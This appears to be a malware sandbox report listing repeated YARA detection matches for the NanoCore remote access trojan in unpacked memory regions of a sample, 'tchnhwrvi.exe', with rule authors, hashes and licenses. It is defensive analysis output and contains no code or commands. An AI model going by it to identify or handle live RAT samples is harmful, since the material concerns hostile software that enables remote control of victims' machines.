      Source: 2.2.tchnhwrvi.exe.7610000.41.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.7610000.41.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.417058.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.417058.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.417058.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.417058.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.2.tchnhwrvi.exe.417058.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.159d2c8.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.159d2c8.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.159d2c8.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.159d2c8.3.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.2.tchnhwrvi.exe.159d2c8.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.5df4629.30.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.5df4629.30.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 1.2.tchnhwrvi.exe.b00000.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 1.2.tchnhwrvi.exe.b00000.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.5df4629.30.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.5df4629.30.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 1.2.tchnhwrvi.exe.b00000.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 1.2.tchnhwrvi.exe.b00000.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 1.2.tchnhwrvi.exe.b00000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.4d32d61.13.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.4d32d61.13.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.4d32d61.13.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.4d32d61.13.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.417058.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.417058.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.417058.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.417058.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.2.tchnhwrvi.exe.417058.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.5df0000.31.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.5df0000.31.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.7590000.35.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.7590000.35.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.7590000.35.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.7590000.35.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.5df0000.31.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.5df0000.31.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.75f0000.40.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.75f0000.40.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.75f0000.40.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.75f0000.40.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.2.tchnhwrvi.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.3290000.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.3290000.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.3290000.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.3290000.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.2.tchnhwrvi.exe.3290000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.4efd95f.17.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.4efd95f.17.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.4efd95f.17.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.4efd95f.17.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.2.tchnhwrvi.exe.4efd95f.17.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.4f0678e.18.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.4f0678e.18.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.4f0678e.18.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.4f0678e.18.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.5bb0000.28.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.5bb0000.28.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.5bb0000.28.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.5bb0000.28.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.43cabf4.12.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.43cabf4.12.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.43cabf4.12.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.43cabf4.12.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.762e8a4.44.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.762e8a4.44.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.762e8a4.44.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.4406f6d.24.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.4406f6d.24.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.4406f6d.24.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
